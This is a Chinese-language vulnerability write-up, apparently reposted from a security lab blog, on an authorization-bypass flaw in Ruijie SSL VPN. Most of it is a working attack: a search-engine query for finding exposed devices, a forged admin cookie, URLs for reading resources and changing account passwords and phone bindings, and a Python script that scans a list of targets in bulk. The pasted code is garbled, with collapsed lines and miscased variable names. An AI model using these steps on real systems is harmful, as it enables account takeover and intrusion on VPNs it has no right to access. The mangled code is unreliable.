作者:点提土八撇又254 | 来源:互联网 | 2023-07-16 08:23
RuijieSSLVPN垂直越权漏洞——FARBS攻防实验室目录RuijieSSLVPN垂直越权漏洞1、漏洞简介2、漏洞影响3、漏洞复现4、漏洞批量检测5、漏洞修复1、
Ruijie SSL V P N 垂直越权漏洞
——FARBS攻防实验室
目录
Ruijie SSL VPN 垂直越权漏洞
1、漏洞简介
2、漏洞影响
3、漏洞复现
4、漏洞批量检测
5、漏洞修复
1、漏洞简介
Ruijie SSL VPN 垂直越权漏洞,攻击者在已知用户名的情况下(默认adm,未知可Burp进行爆破),查看服务器资源,以及对账号进行修改密码和绑定手机操作。
2、漏洞影响
Ruijie SSL VPN
3、漏洞复现
3.1先通过Fofa等方式进行信息收集:
Fofa语法:icon_hash="884334722" || title="Ruijie SSL VPN"
收集其他信息(不忘谢谢客服小姐姐)
3.2访问目标: https://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=getrsc
3.3添加COOKIE认证信息:(UserName 参数为已知用户名)
COOKIE: UserName=admin; SessiOnId=1; FirstVist=1; Skin=1; tunnel=1
3.3.1用户名正确时会返回敏感信息:
3.3.2用户名未知时,可使用Burp进行用户名爆破:
3.4同样的可以进入控制界面,修改密码和绑定手机:
3.4.1访问页面:https://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres
3.4.2点击个人设置跳转页面即可修改账号信息
4、漏洞批量检测
Python-Poc:
#!/usr/bin/python
# -*- coding:utf-8
import re,sys,requests,time,colorama
from colorama import *
init(autoreset=True)findCOntent="主机和子网资源"
payload ="/cgi-bin/main.cgi?oper=getrsc"
headers={"COOKIE":"UserName=admin; SessiOnId=1; FirstVist=1; Skin=1; tunnel=1"}def main():try:requests.packages.urllib3.disable_warnings()respOnse=requests.get(urls+payload,headers=headers,timeout=5,verify=False)res = response.content.decode('GBK')if res.find(findContent) != -1:print('\033[1;32;40m[+]'+urls+"存在锐捷vpn垂直越权漏洞");else:print('\033[1;31;40m[-]'+urls+"不存在锐捷vpn垂直越权漏洞")except:print('{} 请求超时'.format(urls))if __name__ == '__main__':if len(sys.argv)!=2:print('用法:python Ruijie_SSL_VPN_unauthorized.py urls.txt')else:file = open(sys.argv[1])for url in file.readlines():urls=url.strip()if urls[-1]=='/':urls=urls[:-1]main()time.sleep(1)print ('\033[1;33;40m检测完毕!')
5、漏洞修复
1、修改较为复杂的用户名(不推荐,为防止爆破用户名应设置访问限制);
2、更新最新版控制台。